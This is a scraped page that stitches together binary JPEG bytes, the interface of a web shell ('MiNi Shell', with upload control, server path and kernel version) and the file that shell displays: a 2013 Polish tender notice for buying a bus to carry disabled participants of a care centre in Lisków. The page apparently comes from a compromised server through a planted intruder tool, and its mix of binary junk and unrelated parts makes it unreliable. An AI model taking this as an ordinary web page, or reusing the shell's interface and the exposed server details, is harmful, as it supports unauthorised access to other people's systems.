JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130426/167976-N-2013.html

<p class="kh_header"><b>Lisków: Zakup autobusu do transportu osób niepełnosprawnych uczestników Środowiskowego Domu Samopomocy im. Jana Pawła II w Liskowie</b><br>
<b>Numer ogłoszenia: 167976 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Środowiskowy Dom Samopomocy im. Jana Pawła II , ul. Twórców Liskowa 3, 62-850 Lisków, woj. wielkopolskie, tel. 0-62 76 34 059, faks 0-62 76 34 059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.sdsliskow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup autobusu do transportu osób niepełnosprawnych uczestników Środowiskowego Domu Samopomocy im. Jana Pawła II w Liskowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowego autobusu do przewozu osób niepełnosprawnych. Autobus musi spełniać następujące wymagania techniczne:
1) Fabrycznie nowy - rok produkcji 2012 r. lub 2013 r.
2) Liczba miejsc: minimum 19+1 (siedzenie kierowcy), z przystosowaniem do przewozu 1 osoby niepełnosprawnej na wózku inwalidzkim
3) Moc silnika: minimum 140 KM
4) Pojemność skokowa silnika: od 1960 cm3 do 3000 cm3
5) Skrzynia: manualna                                                                                                      6) Silnik wysokoprężny

2. Autobus winien spełniać wymogi normy w zakresie normy emisji substancji szkodliwych i zużycia energii, tj.
1) Norma EURO 5
2) Zużycie energii: maksymalnie 4,68 MJ/km
Zużycie energii wyrażone w megadżulach na kilometr stanowi iloczyn zużycia paliwa (dla paliw ciekłych wyrażone w l/km) określonego zgodnie z wielkością zużywanej energii, zmierzoną według procedury ustalonej dla celów badań homologacyjnych, a w przypadku pojazdów nieobjętych tą procedurą - określoną według innej metody pomiaru zużycia paliwa - i wartości energetycznej paliwa dla oleju napędowego równej 36 MJ/L zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert w odniesieniu do niektórych rodzajów zamówień publicznych (Dz.U. z 2011 r. Nr 96, poz. 559).

3. Wyposażenie autobusu:
1) system zapobiegający zablokowaniu się kół podczas hamowania
2) system optymalizacji przyczepności podczas przyspieszania
3) system stabilizacji toru jazdy
4) poduszka powietrzna kierowcy 
5) układ kierowniczy ze wspomaganiem
6) centralny zamek z pilotem
7) autoalarm z pilotem 
8) immobiliser
9) lusterka zewnętrzne elektrycznie sterowane i podgrzewane o szerokim kącie widzenia                                                                                                
10) lusterko wsteczne wewnętrzne
11) osłona przeciwsłoneczna w kabinie kierowcy
12) przednie i tylne światła przeciwmgielne
13) sygnał dźwiękowy informujący o nie wyłączonych światłach
14) regulowany fotel kierowcy 
15) klimatyzacja przedziału kierowcy i klimatyzacja części pasażerskiej
16) dodatkowy komplet  kół  (felgi + opony zimowe lub letnie, w zależności jakie są zamontowane na pojeździe)
17) chlapacze przednie oraz tylne
18) tachograf cyfrowy z aktualną legalizacją
19) ogranicznik prędkości do 100 km/h                                                                                          
20) szyby w przestrzeni pasażerskiej termoizolacyjne, przyciemniane, zasłonki w oknach
21) minimum 19 foteli turystycznych + fotel kierowcy, z kompletem nieprzemakalnych pokrowców na wszystkie siedzenia w tym samym kolorze 
22) fotele wyposażone w pasy bezpieczeństwa                                                                                   
23) tylny rząd foteli z możliwością szybkiego demontażu i przystosowaniem do przewozu 1 osoby niepełnosprawnej na wózku inwalidzkim
24) antena samochodowa, radiootwarzacz CD i MP3 + głośniki w kabinie kierowcy i przedziale pasażerskim (co najmniej 6 sztuk razem)
25) oświetlenie podsufitowe (nocne i postojowe) przedziału pasażerskiego
26) system ogrzewania również w części pasażerskiej 
27) niezależne ogrzewanie postojowe przestrzeni pasażerskiej 
28) ścianka działowa za kierowcą (przegroda)
29) szyberdach otwierany manualnie
30) podłoga antypoślizgowa na całości pojazdu
31) wybijaki do szyb oraz oznakowanie wyjść awaryjnych 
32) uchwyty, poręcze w drzwiach wejściowych
33) obniżony stopień wejściowy
34) oznakowanie pojazdu zgodne z przepisami o ruchu drogowym (oklejenie samochodu emblematami informującymi o przewozie osób niepełnosprawnych, ostrzegawcze kierunkowskazy dachowe)
35) drzwi wejściowe otwierane elektrycznie z szybą, (sterowane z pozycji kierowcy oraz przez pilota) z wejściem głównym przez drzwi pasażera
36) tapicerka kompletna ścian i sufitu
37) wyciszenie akustyczne całości pojazdu od wewnątrz 
38) kamera cofania  
39) sygnał dźwiękowy biegu wstecznego
40) dodatkowe światło stopu
41) półki na bagaż podręczny
42) komplet pasów do mocowania wózka inwalidzkiego
43) pasy biodrowe zabezpieczające osobę niepełnosprawną na wózku inwalidzkim
44) atestowane zamontowane szyny podłogowe do mocowania wózka inwalidzkiego
45) rampa najazdowa dla wózka inwalidzkiego składana
46) zamontowanie dodatkowych kierunkowskazów w tylnych narożnikach dachu pojazdu 
47) wyposażenie pojazdu w obrysy górne (przód i tył)
48) wyposażenie pojazdu w obrysy boczne
49) wentylator wywiewny w części pasażerskiej pojazdu
50) wycieraczka podłogowa dla stanowiska kierowcy
51) kamizelki odblaskowe 2 sztuki, apteczka doraźnej pomocy
52) trójkąt, gaśnica, koło zapasowe pełno wymiarowe z koszem mocującym, zestawem narzędzi i podnośnikiem hydraulicznym
53) dodatkowa gaśnica 2 kg

4. Gwarancja:
1) minimum 24 miesiące (bez limitu przebiegu kilometrów)
2) minimum 36 miesięcy gwarancji na powłokę lakierniczą
3) minimum 72 miesiące gwarancji na perforację elementów nadwozia
4) dostawca dokona na własny koszt przeglądu gwarancyjnego tak zwanego zerowego udokumentowanego w książce gwarancyjnej pojazdu.

5. Autobus musi posiadać wszystkie niezbędne homologacje i wyposażenie zgodne z wymogami do przewozu osób niepełnosprawnych oraz przepisami o ruchu drogowym.
Dokumentacja pojazdu musi zawierać potwierdzenie dopuszczenia pojazdu do ruchu drogowego.
Autobus sprawny technicznie i wolny od wad konstrukcyjnych.

6. Zamawiający dopuszcza zaoferowanie przedmiotu zamówienia o lepszych parametrach technicznych, wyposażeniu oraz warunkach gwarancji (tj. nie niższych niż określone w Specyfikacji Istotnych Warunków Zamówienia)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.12.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez Wykonawcę formularz ofertowy (sporządzony wg formularza określonego w załączniku nr 1 do SIWZ - wymagana forma oryginał).
2.Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii. 
3.Jeżeli ofertę podpisuje pełnomocnik, pełnomocnictwo do reprezentowania Wykonawcy, zawierające zakres czynności do których uprawnia, jeżeli nie wynika ono z dokumentów o których mowa w ust. XI pkt 2 ppkt 2. Pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii.
4.Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
5.Zakres robót, który zostanie powierzony podwykonawcom (dotyczy przypadku jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sdsliskow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Środowiskowy Dom Samopomocy im. Jana Pawła II w Liskowie, ul. Twórców Liskowa 3, 62-850 Lisków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 11:00, miejsce: Środowiskowy Dom Samopomocy im. Jana Pawła II w Liskowie, ul. Twórców Liskowa 3, 62-850 Lisków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com